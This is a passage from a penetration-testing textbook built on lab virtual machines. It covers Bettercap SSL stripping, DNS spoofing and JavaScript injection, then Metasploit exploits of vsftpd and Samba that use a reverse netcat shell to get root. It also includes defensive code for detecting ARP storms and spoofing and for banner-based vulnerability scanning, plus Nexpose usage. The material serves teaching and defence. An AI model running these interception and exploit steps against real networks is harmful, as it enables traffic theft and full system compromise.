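    out["subdomain"] = store.navigate("http://api.shop.example/v1")
    # 3. Preloaded (static) domain: protected even on the very first visit.
    out["preloaded"] = store.navigate("http://www.facebook.com/")
    # 4. Entry expired: the browser obeys the typed scheme again, so the next http visit is exposed.
    clock[0] += 31536000 + 1
    out["expired"] = store.navigate("http://shop.example/login")
    return out


if __name__ == "__main__":
    for name, url in sslstrip_scenarios().items():
        print(f"{name:18} -> {url}")
```

Scenario 1 is the window sslstrip and Bettercap's hstshijack live in; scenarios 2 and 3 are conditions 2 and 3 above; scenario 4 is why a short max-age (or a host left idle past it) reopens the window.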

Exercise 17: SSL Stripping

There are Bettercap caplets that come preinstalled; to see the available caplets, open the file manager and go to /usr/share/bettercap/caplets.

1. In this exercise we are going to use two caplets, the arpSpoof caplet we created and the hstshijack caplet, to downgrade https connections to http and see the traffic in clear text. However, most browsers come with a preload list of sites that they only ever connect to over https, such as facebook, twitter, linkedin and many more, and against these sites the SSL strip attack will fail.
2. Start both the Windows and Kali virtual machines.
3. In Kali start Bettercap:
#bettercap -iface eth0
>arpSpoof (to start the arpSpoof caplet that we created earlier)
>hstshijack/hstshijack
If no error is seen in the output of hstshijack, the caplet works and can intercept any site that is not in the browser's static HSTS list.

4. On the Windows machine open the Firefox web browser and clear its cache (and its site data, so that no dynamic HSTS entry is left over), then go to a site that does not have static HSTS, such as www.linkdin.com
5. See the output of the Bettercap sniffer.

3.6. MiTM DNS Spoofing

A DNS server is responsible for converting a domain name such as google.com to an IP address, so that the computer can communicate with google.com. A man in the middle can run a DNS server on his computer and resolve the domain name the user asks for to an IP address chosen by the attacker. For example, when a user types www.google.com in his browser, the first thing his computer does is ask the DNS server for the IP address of www.google.com. In a MiTM DNS spoofing attack the attacker sees the DNS request coming from the PC and answers it with a fake IP address that sends the user to another website instead of www.google.com. The user's PC cannot tell that the response came from the attacker rather than the real DNS server, because plain DNS over UDP has no authentication: a reply is accepted if its transaction ID and question match the query, and an attacker on the path sees both.
DNS Spoofing
In the following exercise we run a DNS server and a web server on our Kali machine, then redirect the victim machine to our web server.
DNS spoofing alone will not work against Gmail and other websites that use HTTPS with HSTS. The DNS answer is still spoofed, but modern browsers come with a list of websites that they only open over HTTPS, and the attacker's web server cannot present a valid certificate for that name, so the browser refuses to load the page. The attack works against http websites, and against https websites without an HSTS entry when the victim reaches them over http first (a typed address without the scheme, or an http link).

Exercise 18: DNS Spoofing

1. Start the web server:
#service apache2 start
#service --status-all (to make sure the apache2 service is running)
(Web server files are stored in /var/www/html)

2. Create a new page on the Kali web server:
For testing, rename the current index.html to index.original, then use a text editor to create a file called index.html containing any text and save it in /var/www/html.

3. Test that the website works by opening Firefox and entering the IP address of Kali.

4. From the Windows virtual machine make sure that you can reach the Kali website by entering the IP address of Kali in the web browser.

5. From the Windows virtual machine go to a website that you would like to redirect to Kali, for example rad.infosec.ca

6. Setting up Bettercap to do DNS spoofing:
#bettercap -iface eth0
>help dns.spoof
>set dns.spoof.all true
>set dns.spoof.address 10.0.2.23 (Kali IP address)
>set dns.spoof.domains rad.infosec.ca,www.scratchpads.eu,www.rad-infosec.ca (these are the websites that we will intercept and redirect to the Kali website)
>dns.spoof on
>arpSpoof (to run the arpSpoof caplet that we created; dns.spoof only sees the victim's queries once ARP spoofing routes them through Kali)

7. On the Windows machine open the Firefox browser and clear its cache. Windows also keeps its own DNS cache, so run ipconfig /flushdns if an old answer is still being used.

8. Make sure that the Windows network setting is set to the default (DNS server obtained from DHCP, not a fixed public resolver).

9. Then enter www.rad-infosec.ca: you get the Kali web page.

The Bettercap sniffer shows that the DNS query for www.rad-infosec.ca was spoofed and answered with the local Kali machine's address.
If you enter the rad-infosec.ca address, which is an https site with an HSTS entry stored in the web browser, Bettercap still answers the query, but the attempt fails because the Kali web server is a plain http site that cannot present a valid certificate for the name, and the browser refuses the connection.

3.7. MiTM JavaScript code injection

The man in the middle tool Bettercap also allows us to inject JavaScript code into the websites the victim is visiting, if the website is served over http or over https without an HSTS entry (so that hstshijack can downgrade it). Injecting JavaScript into the victim's web browser is very dangerous, because depending on the code written we can accomplish many things in the victim's browser session: read form input, capture keystrokes, or load further payloads. Note that this is JavaScript, which runs in the browser, not Java.
In the following exercise we use Bettercap to inject JavaScript code that we write ourselves.

Exercise 19: MiTM JavaScript code injection

1. Create the JavaScript file:
#cd /root
#mousepad javacode.js
Enter: alert('TEST JAVA CODE INJECTION'); and save the file as /root/javacode.js

2. Include the javacode.js file in the hstshijack caplet:
#cd /usr/share/bettercap/caplets/hstshijack

3. Modify the hstshijack.cap file by adding *:/root/javacode.js to the line that starts with set hstshijack.payloads (the * means the payload is injected into every host; entries are comma separated).
Save the file.

4. Start Bettercap with the arpSpoof caplet and the hstshijack caplet, as in Exercise 17.

5. From the Windows machine go to an http site: the JavaScript alert is displayed.

6. Go to an https site that does not have static HSTS (the web browser cache must be cleared): the page is downgraded and the alert appears as well.

3.8. MiTM Attack in a Real Network

The Bettercap tool works the same way in a real network (LAN or Wi-Fi) as in the virtual networks of the above exercises, with the following notes regarding real networks:

1. Any card that is connected to the network can send the forged ARP replies, because ARP spoofing uses ordinary frames from an associated (managed mode) interface; the external USB card with injection support is only required for the monitor-mode attacks of chapter 2. If the access point has client isolation enabled, clients cannot talk to each other at layer 2 and ARP spoofing between them fails.

2. In the capture referred to here, 192.168.0.37 is the attacker's card, sending ARP replies to 192.168.0.38, the victim machine.
3. The attacker machine 192.168.0.37 also talks to the real router, 192.168.0.1, so that the victim's return traffic is forwarded to itself.
4. A scanning tool such as autoscan, netdiscover or Bettercap's net.probe is used to find out who is on the network and can be targeted in the MiTM attack.
5. The attack may take longer to start, because the victim machine already has the router in its ARP table; the entry is replaced only when the forged reply arrives.

6. The victim machine can be a PC, a mobile phone or any IP device.

7. Wireshark captures show clearly what is happening: the same IP address (the router's) appears with two different MAC addresses, and the victim's traffic is seen on the attacker's interface.

We can search for a string in Wireshark (Edit -> Find Packet, with "String" selected) to locate credentials or host names in the capture.

8. For more information about Wireshark go to:
https://www.wireshark.org/docs/ where you can find documents, videos and tutorials about Wireshark.

9. We can use Wireshark to discover suspicious traffic in the network; for example, if someone is scanning the network we see a lot of ARP broadcasts.

3.9. Detecting ARP storms by Wireshark


An ARP poisoning attack starts with an ARP scan of the whole subnet to find the live
devices in the network. This can be seen very easily in Wireshark as an ARP
storm: the Wireshark Expert Information pane provides a warning that an ARP
storm was detected.

Exercise 20: Detecting ARP storms with Wireshark


In this exercise we are going to run the netdiscover tool, which does an ARP scan,
and monitor the network with Wireshark to discover the ARP storm created
by the ARP scan.

1. Set up a Wireshark display filter so that only the ARP protocol is shown

2. In Wireshark enable ARP storm detection: go to Edit -> Preferences ->
Protocols / ARP/RARP and enable "Detect ARP request storms"

3. In the Kali machine run the following command to scan the network

#netdiscover -i eth0 -r <subnet>


The ARP broadcasts make it very visible in Wireshark that someone is scanning the
network.

4. Wireshark can also tell us about a MiTM attack in progress.

5. Go to the captured packets in Wireshark and open Analyze -> Expert
Information; you can see the following warning

Here Wireshark is telling us that the 10.0.2.4 machine is duplicating the IP address
of 10.0.2.1 (the router)

3.10. Preventing ARP Poisoning


ARP poisoning, also known as a Man-In-The-Middle (MiTM) attack, is an effective attack if
proper mitigation techniques have not been implemented. A MiTM attack
requires the attacker to be on the same network as the intended victims, so the
attack would need to be initiated from inside the network. There are
many tools and techniques that can be used to detect and prevent ARP
poisoning, such as Intrusion Detection and Prevention Systems (IDS/IPS) and
Layer 2 switches with features to track the MAC addresses connected to their ports.

Use ARP spoofing for something good
ARP spoofing can also be used for good purposes. Very often we see
wireless networks that redirect us to a signup page when we
want to access the wireless LAN or the Internet across this Wi-Fi. Network
registration tools may redirect unregistered hosts to a signup page before
allowing them full access to the network. This is mostly used in public Internet
access points such as airports, malls, hotels and other sorts of networks to control the
access of mobile devices to the Internet, and sometimes to make users pay for
the Internet through a special signup page. For that purpose they are redirected
using ARP spoofing to a device known as a head end processor (HEP).
ARP spoofing can also be used to implement redundancy of network services. A
backup server may use ARP spoofing to take over for a server that has
crashed and transparently offer redundancy.
Cisco IOS 12.2 and up switches have a feature to monitor ARP spoofing, but it
needs DHCP snooping to be enabled as well.

Intrusion Detection/Prevention Systems (IDS/IPS):
IDS/IPSs can be divided into host based and network based. Host based
IDS/IPS are installed on hosts and detect or protect only that host. Network
based IDS/IPS listen on a mirror port of the switch or on some ports of the switch;
they can detect or protect the hosts connected to those ports. IDS systems
can detect ARP attacks and inform the administrator by generating an
appropriate alert or alarm. The main problem with IDS is that they tend to
generate a high number of false positives (alarms that turn out not to be part
of attacks).
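Exercise 20 and the IDS discussion above both come down to the same two signals in the ARP traffic: one sender asking for far too many addresses in a short time (the scan), and one IP address being announced by two different MACs (the poisoning). The following is an added example, not code from the book or from Wireshark: it applies both rules to a constructed capture laid out the way Wireshark lists ARP packets, the way a small network-based detector or an IDS rule would. The MAC addresses, IP addresses and the storm threshold (30 requests within one second) are this example's own choices.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# One ARP packet as Wireshark shows it: (time_s, sender_mac, sender_ip, target_ip, opcode)
# opcode 1 = request ("Who has X? Tell Y"), opcode 2 = reply ("X is at MAC")
ArpRecord = Tuple[float, str, str, str, int]

ROUTER_MAC = "52:54:00:12:35:00"   # constructed: the legitimate 10.0.2.1
VICTIM_MAC = "08:00:27:11:22:33"   # constructed: a client at 10.0.2.5
SCANNER_MAC = "08:00:27:aa:bb:cc"  # constructed: the box at 10.0.2.4 doing the scan


def build_sample_capture() -> List[ArpRecord]:
    """Constructed capture: a 40-host ARP sweep in under half a second,
    one normal request/reply pair, then replies claiming the router's IP."""
    records: List[ArpRecord] = []
    for i in range(1, 41):                       # sweep: one who-has per host, 12 ms apart
        records.append((0.012 * i, SCANNER_MAC, "10.0.2.4", f"10.0.2.{i}", 1))
    records.append((5.000, VICTIM_MAC, "10.0.2.5", "10.0.2.1", 1))   # victim asks for router
    records.append((5.001, ROUTER_MAC, "10.0.2.1", "10.0.2.5", 2))   # router answers
    for k in range(3):                           # poisoning: 10.0.2.1 "is at" the scanner's MAC
        records.append((6.0 + k, SCANNER_MAC, "10.0.2.1", "10.0.2.5", 2))
    return records


def detect_request_storms(records: List[ArpRecord],
                          max_requests: int = 30, period_s: float = 1.0) -> Dict[str, int]:
    """Sender MACs that emit more than max_requests ARP requests inside any
    sliding window of period_s seconds, with the peak count seen.
    (Wireshark's 'Detect ARP request storms' preference applies the same
    count-per-period idea; the thresholds here are this example's choice.)"""
    times_by_sender: Dict[str, List[float]] = defaultdict(list)
    for t, mac, _sip, _tip, op in records:
        if op == 1:
            times_by_sender[mac].append(t)
    storms: Dict[str, int] = {}
    for mac, times in times_by_sender.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > period_s:
                start += 1
            in_window = end - start + 1
            if in_window > max_requests:
                storms[mac] = max(storms.get(mac, 0), in_window)
    return storms


def detect_duplicate_ips(records: List[ArpRecord]) -> Dict[str, Set[str]]:
    """IP addresses announced by more than one MAC (the 'duplicate IP address'
    condition Wireshark's Expert Information flags). Looks at the sender
    fields of both requests and replies."""
    macs_by_ip: Dict[str, Set[str]] = defaultdict(set)
    for _t, mac, sender_ip, _tip, _op in records:
        macs_by_ip[sender_ip].add(mac)
    return {ip: macs for ip, macs in macs_by_ip.items() if len(macs) > 1}


if __name__ == "__main__":
    capture = build_sample_capture()
    print("request storms:", detect_request_storms(capture))
    print("duplicate IPs :", detect_duplicate_ips(capture))
```

The duplicate-IP rule is the more reliable of the two on a real LAN: a storm can also be a monitoring tool or a host rebooting, whereas a second MAC answering for the gateway's address is almost always either a misconfiguration or an attack, and either way is worth an alert.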

4
Gaining Access (Server Side)

In this chapter we will learn how to find vulnerabilities in servers
and how to exploit them to gain access to and control of the server,
through manual exercises that use Nmap (the Zenmap application in
Kali Linux), then search the Internet for the vulnerability exploit,
and then use the Metasploit framework, which automates the whole
process of finding the vulnerability and exploiting it.

4. Gaining Access (Server Side)


After getting inside the network we need to see how to gain access to the
computing devices inside that network: servers, web servers, client PCs, routers,
smartphones, tablets, TVs.
Gaining access requires a lot of information gathering about the client or the
server; in the exercises in this section we are going to focus on two
approaches:

Server side

Does not need user interaction; all we need is the target IP.
Start information gathering by finding open ports, the OS and the installed
services (applications).
Quite simple if the target is in the same network.
If the target has a domain name, then a simple ping will return its IP
address.

Client side
Gaining access to someone's computing devices requires more information
gathering and social engineering skills to obtain user interaction, such as
opening a file or clicking on a link.
4.1. Server-Side attacks
Basic Information gathering and exploitation

Exercise 21: Basic Information Gathering using Zenmap


1. In this exercise we are going to use Zenmap to do information
gathering about a server whose IP address we know.
2. Zenmap will give us all the open ports and running services on this
server.
3. We are going to target the second Linux virtual machine installed in
our virtual environment.
4. In VirtualBox start the Metasploitable machine.
5. Log in to the machine with the user:
6. msfadmin/msfadmin
7. Type

#uname -a ( this gives you the server name )

8. Check the machine IP address using the command #ifconfig

9. In the Kali machine open the Zenmap application, enter the IP address
of the Metasploitable machine and choose Intense scan

10. In the output of Zenmap check the open ports (services) given and
check the Internet for these services' vulnerabilities, backdoors and
exploits.
11. We are going to show two examples from the output of Zenmap:
12. The FTP service clearly shows that anonymous users can access the server
through FTP without the need for a username and password.
13. Install an FTP client like FileZilla (https://filezilla-project.org) to start
browsing the files inside that server.
14. If you dig further on the Internet into the weaknesses of this FTP version
you might find a tool that allows you to get access to the server
itself, not only to the FTP section of it.
15. Port 512/TCP is open and runs the service netkit-rsh rexecd, which
is a remote process execution service on Linux systems.

Exercise 22: Exploit RSH client vulnerability


1. If we search Google about another vulnerability discovered by
Zenmap, such as netkit-rsh, we find that it is a remote shell access
service and that we can find tools on the Internet to exploit it.

2. This service basically allows us to access the server remotely and
lets us execute remote commands on the target computer.
3. If we continue searching about netkit-rsh we will find more info and
the client software package.

4. Install rsh-client in the Kali Linux machine.

#apt-get install rsh-client

5. We are going to use rsh-client to access the Metasploitable machine
using the rlogin command as shown in the screenshot.

#rlogin -l root <target machine IP address>

4.2. Exploiting a Basic Vulnerability


Exercise 23: Exploit Ftp vulnerability


1. Start the Kali Linux machine
2. Start the Metasploitable Linux machine and check its IP address
3. From the Kali machine run Zenmap against the IP address of the
Metasploitable machine to check for vulnerabilities.

4. Google vsftpd 2.3.4 to see if there is a backdoor in this version
and if there is an exploit that uses that backdoor.
5. The output shows that there is a backdoor.

6. Copy the name of the Metasploit module that can open the backdoor.
7. Go to a Kali Linux terminal and type
8. #msfconsole to start Metasploit

msf> search vsftpd

9. Type: msf> use exploit/unix/ftp/vsftpd_234_backdoor

10. After starting the exploit module type > show options

11. From the show options command we can see that there are two options:
RHOST (Remote Host) and RPORT (Remote Port), so
we are going to connect to the machine by giving the exploit
the IP address of the target machine in RHOST.
12. Input the IP address of the target machine: > set RHOST 10.0.2.8

13. Start the exploit by typing > exploit

14. As you can see from the above screenshot, we have root access to
the target machine; we can do anything we want on that machine.

4.3. Code Execution vulnerabilities


So far, we have seen access through default passwords, service
misconfiguration and backdoors.
In this section we are going to see how to access a machine using
vulnerabilities that exist in a certain service, through command execution that
will give us full access to the target machine. We are going to use a reverse
connection, i.e. we are going to set up the target machine to connect to our
attack machine using the port we chose; this way we can work around
firewalls (normally firewalls are set to refuse any connection from external to
internal but allow connections from internal to external).

Exercise 24: Exploiting Code Execution Vulnerability


1. Start Zenmap in the Kali Linux machine to find vulnerabilities

2. Google for the Samba service 3.x on port 139 to see its vulnerabilities
3. Take the result from the Rapid7 website (Rapid7 is the same company
that developed the Metasploit framework)

4. Start Metasploit by typing #msfconsole

5. At the msf console type > use exploit/multi/samba/usermap_script

6. After the exploit module starts, type > show options

Note
Using the exploits and running them is always the same; even if you
get a new exploit, by following these steps you can run any exploit.
Just remember to check the options of the exploit and what they
allow you to do in the target machine.

7. Set up RHOST with the target machine using the command

>set RHOST 10.0.2.8

8. Inject a payload into the target machine to exploit the flaw in the
Samba program.
Samba provides file and print services for all clients using
the SMB/CIFS protocol, such as all versions of DOS
and Windows, OS/2, Linux, and many others. Samba
is an important component to seamlessly integrate
Linux/Unix servers and desktops into Active
Directory environments. It can function both as a
domain controller or as a regular domain member.
The Samba version that is running in the Metasploitable
machine has a buffer overflow vulnerability that
allows adversaries to run a small piece of code inside it; we need
to create a PAYLOAD and run it in the target
computer, and the payload will let us run Linux commands
in the target machine.
9. To see the different types of payloads type >show payloads

10. Notice that there are bind payloads and there are reverse payloads.

Payloads are small pieces of code that will be executed inside the target
machine once the vulnerability is exploited.

11. We are going to use a reverse payload to bypass the firewall in the
target network.

With a reverse payload the victim machine initiates the connection
to the attack machine (Kali Linux).

12. Use msfconsole in Kali to set up the port and IP address of the Kali
machine that the victim should connect to.

Type
>set PAYLOAD cmd/unix/reverse_netcat
>show options

13. LHOST is the attacker machine IP address (Kali); LPORT
sets the port.
14. Check the Kali machine IP address

15. Set LHOST and LPORT

>set LHOST <IP address of Kali machine>
>set LPORT 80
>set RHOST <IP address of victim machine>

16. Show options

17. Run the exploit

18. >exploit

Now the target machine is connected to my machine on port 80 and I have
access as root (as you can see from the id and uname -a commands); this means
I have full access to the target machine.

5.
Vulnerability Management

Vulnerability scanning is an organized approach to the testing,
identification, analysis and reporting of potential security issues on
a network. The I.T. department must run vulnerability scans on a
weekly basis in order to be safe from any new issues that might
appear in the OS, applications and networks. There are many tools to
do vulnerability scanning, such as Nessus, Qualys, Rapid7 Nexpose
and more. In this section we are going to install and run the Nexpose
vulnerability scanning tool.

5. Vulnerability Scanning
Vulnerability scanning is an inspection of the potential points of exploit on a
computer or network to identify security holes.
A vulnerability scan detects and classifies system weaknesses in computers,
networks and communications equipment and predicts the effectiveness of
countermeasures. A scan may be performed by the organization's IT
department or by a security service provider, possibly as a condition imposed
by some authority. Vulnerability scans are also used by attackers looking for
points of entry.
A vulnerability scanner runs from the end point of the person inspecting the
attack surface in question. The software compares details about the target
attack surface to a database of information about known security holes in
services and ports, anomalies in packet construction, and potential paths to
exploitable programs or scripts. The scanner software attempts to exploit
each vulnerability that is discovered.
Running a vulnerability scan can pose its own risks as it is inherently
intrusive on the target machine’s running code. As a result, the scan can
cause issues such as errors and reboots, reducing productivity.
There are two approaches to vulnerability scanning, authenticated and
unauthenticated scans. In the unauthenticated method, the tester performs the
scan as an intruder would, without trusted access to the network. Such a scan
reveals vulnerabilities that can be accessed without logging into the network.
In an authenticated scan, the tester logs in as a network user, revealing the
vulnerabilities that are accessible to a trusted user, or to an intruder that has
gained access as a trusted user.
5.1. Basic Vulnerability detection methods
Vulnerability detection starts with the vulnerability scanning software reading
the target's banner or application version, or checking the protocol version that
the target system is using. Then the vulnerability scanning software checks
the vulnerability databases; by looking at these databases the vulnerability
scanning software can know if there is a weakness in that application, service
or OS.
The protocols that applications use to communicate with clients may also have
vulnerabilities; for example, a weak encryption method in a communication
protocol can be exploited easily. The vulnerability scanner can send different
packets into the network to examine the behavior of the service against these
packets, and examine whether the behavior is similar to the behavior of
vulnerable services.
Wrong configurations may cause weaknesses; for example, if you configure
your web authentication mechanism to allow three-character passwords, they can
very easily be cracked by attackers.
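The first detection method described above (read the banner, parse the version, look it up) is what Zenmap's service detection plus a Google search did by hand in Exercises 21 to 24. The following is an added example, not code from the book or from any scanner product, that shows the same pipeline in a few functions: banner patterns, version parsing, a range lookup, and the case a banner-only scan cannot decide. The vulnerability database, its placeholder ids and the sample banners are constructed for the example; the two entries mirror the vsftpd 2.3.4 and Samba username-map flaws the book's exercises use.

```python
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, ...]

# Constructed, deliberately tiny vulnerability database. The "id" values are
# placeholders, not real CVE numbers; a real scanner consults NVD and vendor
# feeds. Entry 1 is the backdoored vsftpd release of Exercise 23, entry 2 the
# Samba username-map script flaw of Exercise 24 (range as used in this sample).
VULN_DB: List[Dict] = [
    {"product": "vsftpd", "lo": (2, 3, 4), "hi": (2, 3, 4),
     "id": "PLACEHOLDER-VSFTPD-234", "summary": "backdoored release"},
    {"product": "samba", "lo": (3, 0, 20), "hi": (3, 0, 25),
     "id": "PLACEHOLDER-SAMBA-USERMAP", "summary": "username map script command injection"},
]

# How a scanner recognises a product from the text a service sends first.
BANNER_PATTERNS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"\(vsFTPd ([\w.]+)\)"), "vsftpd"),
    (re.compile(r"^SSH-\d\.\d-OpenSSH_([\w.]+)"), "openssh"),
    (re.compile(r"Samba smbd ([\w.]+)", re.IGNORECASE), "samba"),
]

# Constructed banners in the shape Zenmap's service detection reports them.
SAMPLE_BANNERS: List[Tuple[int, str]] = [
    (21, "220 (vsFTPd 2.3.4)"),
    (22, "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1"),
    (139, "Samba smbd 3.X"),
    (8180, "Apache-Coyote/1.1"),
]


def parse_version(text: str) -> Optional[Version]:
    """'2.3.4' -> (2, 3, 4); '4.7p1' -> (4, 7); '3.X' -> None (not disclosed)."""
    parts: List[int] = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if m is None:
            return None
        parts.append(int(m.group()))
    return tuple(parts)


def identify(banner: str) -> Optional[Tuple[str, Optional[Version]]]:
    """Map a banner to (product, version). None when the banner is unknown."""
    for pattern, product in BANNER_PATTERNS:
        m = pattern.search(banner)
        if m:
            return product, parse_version(m.group(1))
    return None


def lookup(product: str, version: Version) -> List[str]:
    """Ids of database entries whose [lo, hi] range contains the version."""
    return [e["id"] for e in VULN_DB
            if e["product"] == product and e["lo"] <= version <= e["hi"]]


def scan_banners(banners: List[Tuple[int, str]]) -> List[Dict]:
    """One finding per port; 'status' is what a report would show."""
    findings = []
    for port, banner in banners:
        ident = identify(banner)
        if ident is None:
            findings.append({"port": port, "status": "unrecognised banner", "ids": []})
            continue
        product, version = ident
        if version is None:
            # The banner hides the exact version: an unauthenticated scan
            # cannot decide, so flag it for an authenticated (credentialed) check.
            findings.append({"port": port, "product": product,
                             "status": "version not disclosed; needs authenticated check",
                             "ids": []})
            continue
        ids = lookup(product, version)
        findings.append({"port": port, "product": product, "version": version,
                         "status": "vulnerable" if ids else "no known issue in database",
                         "ids": ids})
    return findings


if __name__ == "__main__":
    for finding in scan_banners(SAMPLE_BANNERS):
        print(finding)
```

The Samba line is the instructive one: a banner of "3.X" is exactly the situation where the unauthenticated scan described above runs out of evidence, and a real scanner either sends protocol probes (the second method in this section) or, in an authenticated scan, reads the package version from the host itself.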
5.2. Vulnerability Scanning software
A vulnerability scanner is software designed to assess computer systems,
networks and applications for known weaknesses. These scanners are used to
discover weak points or poorly constructed parts, and are utilized for the
identification and detection of vulnerabilities related to misconfigured assets
or faulty software that reside in network-based assets such as firewalls, routers,
web servers, application servers, etc.
There is a lot of vulnerability scanning software; here is a list of well-known
vulnerability scanning software:

Nmap NSE: Nmap is port scanning software, but with the help of the
Nmap Scripting Engine (NSE) it is possible to use Nmap as a
vulnerability scanner.
Nessus: Nessus is vulnerability assessment software developed by
Tenable Network Security and is one of the most popular and capable
vulnerability scanners. Nessus Professional is the commercial
product; in addition a free Nessus community version is also
available, but it is limited and can only be licensed for home networks.

Nessus allows scanning for:

Patch tests without using agents.
Detecting misconfigurations.
Port scans.
Service detection.
Trying known credentials.
Ability to use exploits.
Ability to look for credentials.
70,000+ plugins.
Reporting.
Microsoft MBSA: Microsoft Baseline Security Analyzer provides a
streamlined method to identify missing security updates and common
security misconfigurations. MBSA is only for Microsoft systems
and it is not an overall vulnerability scanner at all.
Nexpose: is a commercial tool developed by Rapid7, the producers
of the Metasploit framework; it is a vulnerability scanner which aims to
support the entire vulnerability assessment process lifecycle,
including discovery, detection, verification, risk classification,
impact analysis, reporting and mitigation.
OpenVAS: is an open source vulnerability scanner that was forked
from the last free version of Nessus after that tool went proprietary
in 2005.
SAINT: a commercial vulnerability assessment tool; like Nessus it
used to be free and open source but is now a commercial product.
SAINT runs only on Linux and Mac OS and does not support or run
on Windows.
GFI LanGuard: is a network security and vulnerability scanner
designed to help with patch management.
QualysGuard: is a popular cloud-based SaaS (Software as a
Service) vulnerability management product; its web-based UI offers network
discovery and mapping, assists prioritization, and provides vulnerability
assessment reporting and remediation tracking according to
business risks.

5.3. Vulnerability Database


A vulnerability database is a platform aimed at collecting, maintaining and
disseminating information about discovered vulnerabilities targeting
computer systems. The database will customarily describe the identified
vulnerability, assess the potential impact on affected systems, and list any
workarounds or updates to mitigate the issue. For a hacker to surmount a
system's information assurance, three elements must apply: a vulnerability
within the system, access to the vulnerability, and the ability to exploit the
vulnerability. Here are the best-known vulnerability databases:

Open Source Vulnerability Database (OSVDB) (http://osvdb.org)

The Open Source Vulnerability Database provided an accurate,
technical and unbiased index on vulnerability security. The
comprehensive database catalogued over 121,000 vulnerabilities
spanning a 113-year period. The OSVDB was founded in August 2002
and was launched in March 2004. In its primitive beginning, newly
identified vulnerabilities were investigated by site members and
explanations were detailed on the website. However, as the necessity for
the service thrived, the need for dedicated staff resulted in the inception
of the Open Security Foundation (OSF), and the OSVDB was shut down
in April 2016; a paid service, VulnDB, took its place.

NIST National Vulnerability Database (https://nvd.nist.gov/)

The US government repository of standards-based vulnerability management
data represented using the Security Content Automation Protocol
(SCAP). This data enables automation of vulnerability management,
security measurement and compliance. The NVD includes databases of
security checklist references, security-related software flaws,
misconfigurations, product names and impact metrics.

CVE Details: Common Vulnerabilities and Exposures
(https://www.cvedetails.com/) The Common Vulnerabilities and
Exposures (CVE) system provides a reference method for publicly
known information-security vulnerabilities and exposures. The
National Cybersecurity FFRDC, operated by the MITRE Corporation,
maintains the system, with funding from the National Cyber
Security Division of the United States Department of Homeland
Security. The Security Content Automation Protocol uses CVE, and
CVE IDs are listed on MITRE's system as well as in the US
National Vulnerability Database.

5.4. Vulnerability Management with Nexpose


Rapid7 Nexpose is a vulnerability scanner which aims to support the
entire vulnerability management lifecycle, including discovery,
detection, verification, risk classification, impact analysis, reporting and
mitigation. It integrates with Rapid7's Metasploit for vulnerability
exploitation. It is sold as standalone software, an appliance, a virtual
machine, or as a managed service or private cloud deployment. User
interaction is through a web browser. There is a free limited community
edition of Nexpose, as well as commercial versions.

Exercise 25: Vulnerability Management – installing Nexpose


Note
Nexpose is server software that needs a minimum of 8 GB RAM and more than
100 GB of disk space, and it might not work in a virtual machine if you do not have
enough memory and disk space for Kali.

From the Kali machine:

Download Nexpose Free Community from the following link:
https://www.rapid7.com/info/nexpose-community/

Fill in the information to get a one-year free license key via email.
Download the Linux version, as we are going to use it in Kali Linux.
Stop the PostgreSQL database in Kali Linux, because Nexpose comes with
its own PostgreSQL database and it will conflict with the Kali Linux
database:

#service postgresql stop

Change the downloaded Nexpose file to an executable file.

Run the file:

# ./Rapid7setup-Linux64.bin

Follow the GUI installer.

Choose "Security Console with local Scan Engine".
Enter the username and password to be used to access Nexpose
(root/password)

Do not choose "Initialize and start Nexpose after installation"

5.5. Starting and Configuring Nexpose

Go to the Nexpose directory inside Kali

#cd /opt/rapid7/nexpose/nsc

Start Nexpose

#./nsc.sh

The first time it will take about 30 minutes to start because it will update
its vulnerability database.
Open Firefox and go to
https://localhost:3780

Click on Advanced, then Accept the Risk

Log in with the username and password you set up during the Nexpose
installation and then enter the license number that you received from
Rapid7 via email.

Note
If you chose to start the Nexpose service automatically during the installation,
that could cause Nexpose to fail to start; if you face that scenario do the
following:
- Stop the Nexpose service (see the command in the above screen capture)
- Disable Nexpose from starting automatically
- Start the Nexpose service
- Restart the Kali machine
- Start Nexpose

Exercise 26: Running Nexpose


1. Start the Metasploitable machine from VirtualBox and check its IP
address

2. In the Nexpose configuration GUI, create a site; give the site a name and
a description

3. Click on Sites and add the IP addresses of the machines that you need
to scan

4. Click Save
5. Click on the site name

6. Click Scan Now and give the scan a name, then start the scan
7. The scan will take at least 15 minutes to finish

8. To see the details about the found vulnerabilities, click on the
machine name

9. Click on a vulnerability to see detailed information

5.6. Nexpose Reports Analysis


You may want any number of people in your organization to view asset and
vulnerability data without logging on to the Security Console. For example, a
chief information security officer (CISO) may need to see statistics about
your overall risk trends over time. Or members of your security team may
need to see the most critical vulnerabilities for sensitive assets so that they
can prioritize remediation projects. It may be unnecessary or undesirable for
these stakeholders to access the application itself. By generating reports, you
can distribute critical information to the people who need it via e-mail or
integration of exported formats such as XML, CSV or database formats.
Reports provide many varied ways to look at scan data, from business-
centric perspectives to detailed technical assessments. You can learn
everything you need to know about vulnerabilities and how to remediate
them, or you can just list the services that are running on your network assets.
You can create a report on a site, but reports are not tied to sites. You can
parse assets in a report any number of ways, including all your scanned
enterprise assets, or just one.

Exercise 27: Nexpose Analysis and Report Generating


After the scan finishes, you can create a PDF report from the system. In this
exercise we are going to generate a summary report that includes
recommendations of what needs to be done regarding the discovered
vulnerabilities.
To create a professional PDF report for the scan:

Click on the Report icon at the side of the screen
Give a name to the report
Choose the report type:
Audit Report: detailed report about each vulnerability.
Executive Report: summarized report.
Newly Discovered Assets: if you are scanning a complete
subnet it will show the discovered devices.
Top 10 Vulnerabilities Report.
Choose the scan
Run the report

To reset the Nexpose password:

#screen -x nexpose
➢ Reset password <username> <new password> <new password>
➢ Unlock account <username>

5.7. Other Nexpose functions


Discovered Devices

Discovered Vulnerabilities

6
Gaining Access (Client-Side Attacks)

Client-side attacks differ from server-side attacks because they need the
end user's interaction: downloading and running a malware that
will create a backdoor inside the client machine, or gather
information from the client machine and send it to the hacker's
machine. This kind of attack needs a lot of information gathering
and social engineering to convince or deceive the client to click on
a file or link sent to him. In this section we are going to use the Veil-
Evasion framework to generate a payload executable that can bypass
common antivirus software. Veil-Evasion is an open source
framework that is located at https://www.veil-framework.com/

6. Gaining Access (Client-Side Attacks)

Client-side attacks are used if server-side attacks fail.
They require user interaction.
Social engineering can be useful.
Information gathering is vital.

6.1. Using Veil Evasion Framework
